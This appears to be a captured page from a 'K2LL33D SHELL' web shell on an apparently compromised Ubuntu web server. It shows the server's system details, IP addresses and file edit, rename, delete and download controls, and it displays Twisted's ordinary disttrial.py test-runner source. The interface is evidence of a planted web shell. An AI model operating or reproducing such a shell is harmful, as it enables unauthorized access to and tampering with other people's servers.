K2LL33D SHELL

 Apache/2.4.7 (Ubuntu)
 Linux sman1baleendah 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 safemode : OFF
 MySQL: ON | Perl: ON | cURL: OFF | WGet: ON
  >  / usr / lib / python2.7 / dist-packages / twisted / trial / _dist /
server ip : 172.67.156.115

your ip : 108.162.216.94

H O M E


Filename: /usr/lib/python2.7/dist-packages/twisted/trial/_dist/disttrial.py
Size: 8.5 kb
Permission: rw-r--r--
Owner: root : root
Create time: 27-Apr-2025 09:56
Last modified: 30-May-2013 09:52
Last accessed: 07-Jul-2025 07:27
Actions: edit | rename | delete | download (gzip)
View: text | code | image
# -*- test-case-name: twisted.trial._dist.test.test_disttrial -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
This module contains the trial distributed runner, the management class
responsible for coordinating all of trial's behavior at the highest level.

@since: 12.3
"""

import os
import sys

from twisted.python.filepath import FilePath
from twisted.python.modules import theSystemPath
from twisted.internet.defer import DeferredList
from twisted.internet.task import cooperate

from twisted.trial.util import _unusedTestDirectory
from twisted.trial.unittest import _iterateTests
from twisted.trial._dist.worker import LocalWorker, LocalWorkerAMP
from twisted.trial._dist.distreporter import DistReporter
from twisted.trial.reporter import UncleanWarningsReporterWrapper
from twisted.trial._dist import _WORKER_AMP_STDIN, _WORKER_AMP_STDOUT



class DistTrialRunner(object):
    """
    A specialized runner for distributed trial. The runner launches a number of
    local worker processes which will run tests.

    @ivar _workerNumber: the number of workers to be spawned.
    @type _workerNumber: C{int}

    @ivar _workerArguments: extra command-line arguments appended to every
        worker process invocation.

    @ivar _stream: stream which the reporter will use.

    @ivar _reporterFactory: the reporter class to be used.

    @ivar _tbformat: traceback format passed to the reporter factory.

    @ivar _rterrors: passed to the reporter factory as C{realtime}.

    @ivar _uncleanWarnings: if true, the reporter is wrapped in
        L{UncleanWarningsReporterWrapper}.

    @ivar _workingDirectory: base path handed to C{_unusedTestDirectory} to
        obtain the directory in which workers run.

    @ivar _logFile: log file name passed to every L{LocalWorker}.
    """
    _distReporterFactory = DistReporter

    def _makeResult(self):
        """
        Make reporter factory, and wrap it with a L{DistReporter}.

        @return: The reporter built by C{self._reporterFactory}, optionally
            wrapped in L{UncleanWarningsReporterWrapper}, and finally wrapped
            by C{self._distReporterFactory}.
        """
        reporter = self._reporterFactory(self._stream, self._tbformat,
                                         realtime=self._rterrors)
        if self._uncleanWarnings:
            reporter = UncleanWarningsReporterWrapper(reporter)
        return self._distReporterFactory(reporter)


    def __init__(self, reporterFactory, workerNumber, workerArguments,
                 stream=None,
                 tracebackFormat='default',
                 realTimeErrors=False,
                 uncleanWarnings=False,
                 logfile='test.log',
                 workingDirectory='_trial_temp'):
        """
        Store the configuration of the runner.

        @param reporterFactory: the reporter class to be used.

        @param workerNumber: the maximum number of workers to spawn.
        @type workerNumber: C{int}

        @param workerArguments: extra arguments passed to each worker
            process.

        @param stream: stream which the reporter will use; C{sys.stdout} is
            used when this is C{None}.

        @param tracebackFormat: traceback format passed to the reporter.

        @param realTimeErrors: passed to the reporter as C{realtime}.

        @param uncleanWarnings: if true, wrap the reporter in
            L{UncleanWarningsReporterWrapper}.

        @param logfile: log file name passed to each L{LocalWorker}.

        @param workingDirectory: base path for the test directory.
        """
        self._workerNumber = workerNumber
        self._workerArguments = workerArguments
        self._reporterFactory = reporterFactory
        if stream is None:
            stream = sys.stdout
        self._stream = stream
        self._tbformat = tracebackFormat
        self._rterrors = realTimeErrors
        self._uncleanWarnings = uncleanWarnings
        self._result = None
        self._workingDirectory = workingDirectory
        self._logFile = logfile
        # The three attributes below are only initialised here; nothing else
        # in this class reads or writes them.
        self._logFileObserver = None
        self._logFileObject = None
        self._logWarnings = False


    def writeResults(self, result):
        """
        Write test run final outcome to result.

        @param result: A C{TestResult} which will print errors and the summary.
        """
        result.done()


    def createLocalWorkers(self, protocols, workingDirectory):
        """
        Create local worker protocol instances and return them.

        @param protocols: An iterable of L{LocalWorkerAMP} instances.

        @param workingDirectory: The base path in which we should run the
            workers.
        @type workingDirectory: C{str}

        @return: A list of L{LocalWorker} instances, one per protocol. Each
            worker is given its own sub-directory of C{workingDirectory},
            named after its index in C{protocols}.
        """
        return [LocalWorker(protocol,
                            os.path.join(workingDirectory, str(x)),
                            self._logFile)
                for x, protocol in enumerate(protocols)]


    def launchWorkerProcesses(self, spawner, protocols, arguments):
        """
        Spawn processes from a list of process protocols.

        @param spawner: A C{IReactorProcess.spawnProcess} implementation.

        @param protocols: An iterable of C{ProcessProtocol} instances.

        @param arguments: Extra arguments passed to the processes.
        """
        workertrialPath = theSystemPath[
            'twisted.trial._dist.workertrial'].filePath.path
        # In addition to the standard descriptors, two extra descriptors are
        # mapped for the AMP conversation with the worker.
        childFDs = {0: 'w', 1: 'r', 2: 'r', _WORKER_AMP_STDIN: 'w',
                    _WORKER_AMP_STDOUT: 'r'}
        environ = os.environ.copy()
        # Add an environment variable containing the raw sys.path, to be used
        # by subprocesses to make sure it's identical to the parent. See
        # workertrial._setupPath.
        environ['TRIAL_PYTHONPATH'] = os.pathsep.join(sys.path)
        for worker in protocols:
            args = [sys.executable, workertrialPath]
            args.extend(arguments)
            spawner(worker, sys.executable, args=args, childFDs=childFDs,
                    env=environ)


    def _driveWorker(self, worker, result, testCases, cooperate):
        """
        Drive a L{LocalWorkerAMP} instance, iterating the tests and calling
        C{run} for every one of them.

        @param worker: The L{LocalWorkerAMP} to drive.

        @param result: The global L{DistReporter} instance.

        @param testCases: The global list of tests to iterate.

        @param cooperate: The cooperate function to use, to be customized in
            tests.
        @type cooperate: C{function}

        @return: A C{Deferred} firing when all the tests are finished.
        """

        def resultErrback(error, case):
            # Record the failure against the wrapped reporter, then return
            # the error so that it keeps propagating down the errback chain.
            result.original.addFailure(case, error)
            return error

        def task(case):
            d = worker.run(case, result)
            d.addErrback(resultErrback, case)
            return d

        return cooperate(task(case) for case in testCases).whenDone()


    def run(self, suite, reactor=None, cooperate=cooperate,
            untilFailure=False):
        """
        Spawn local worker processes and load tests. After that, run them.

        Unless the suite is empty, this starts the reactor with
        C{reactor.run()} and only returns once the reactor has stopped.

        @param suite: A tests suite to be run.

        @param reactor: The reactor to use, to be customized in tests.
        @type reactor: A provider of
            L{twisted.internet.interfaces.IReactorProcess}

        @param cooperate: The cooperate function to use, to be customized in
            tests.
        @type cooperate: C{function}

        @param untilFailure: If C{True}, continue to run the tests until they
            fail.
        @type untilFailure: C{bool}.

        @return: The test result.
        @rtype: L{DistReporter}
        """
        if reactor is None:
            from twisted.internet import reactor
        result = self._makeResult()
        count = suite.countTestCases()
        self._stream.write("Running %d tests.\n" % (count,))

        if not count:
            # Take a shortcut if there is no test
            suite.run(result.original)
            self.writeResults(result)
            return result

        testDir, testDirLock = _unusedTestDirectory(
            FilePath(self._workingDirectory))
        # Never spawn more workers than there are tests to run.
        workerNumber = min(count, self._workerNumber)
        # range() rather than the Python 2 only xrange(): the count is small
        # and range() exists on every Python version.
        ampWorkers = [LocalWorkerAMP() for x in range(workerNumber)]
        workers = self.createLocalWorkers(ampWorkers, testDir.path)
        processEndDeferreds = [worker.endDeferred for worker in workers]
        self.launchWorkerProcesses(reactor.spawnProcess, workers,
                                   self._workerArguments)

        def runTests():
            # A single iterator is shared by all the workers, so each test
            # case is pulled, and therefore run, by exactly one of them.
            testCases = iter(list(_iterateTests(suite)))

            workerDeferreds = []
            for worker in ampWorkers:
                workerDeferreds.append(
                    self._driveWorker(worker, result, testCases,
                                      cooperate=cooperate))
            return DeferredList(workerDeferreds, consumeErrors=True,
                                fireOnOneErrback=True)

        # Used as a mutable flag shared by the closures below: it is non-empty
        # once either stop() or beforeShutDown() has started the shutdown.
        stopping = []

        def nextRun(ign):
            self.writeResults(result)
            if not untilFailure:
                return
            if not result.wasSuccessful():
                return
            # untilFailure is set and everything passed: run the tests again.
            d = runTests()
            return d.addCallback(nextRun)

        def stop(ign):
            testDirLock.unlock()
            if not stopping:
                stopping.append(None)
                reactor.stop()

        def beforeShutDown():
            # Only act when the shutdown was not initiated by stop(): wait for
            # the worker processes to end, then write the results.
            if not stopping:
                stopping.append(None)
                d = DeferredList(processEndDeferreds, consumeErrors=True)
                return d.addCallback(continueShutdown)

        def continueShutdown(ign):
            self.writeResults(result)
            return ign

        d = runTests()
        d.addCallback(nextRun)
        # addBoth: release the directory lock and stop the reactor whether
        # the run succeeded or failed.
        d.addBoth(stop)

        reactor.addSystemEventTrigger('before', 'shutdown', beforeShutDown)
        reactor.run()

        return result


    def runUntilFailure(self, suite):
        """
        Run the tests with local worker processes until they fail.

        @param suite: A tests suite to be run.

        @return: The test result, as returned by L{run}.
        """
        return self.run(suite, untilFailure=True)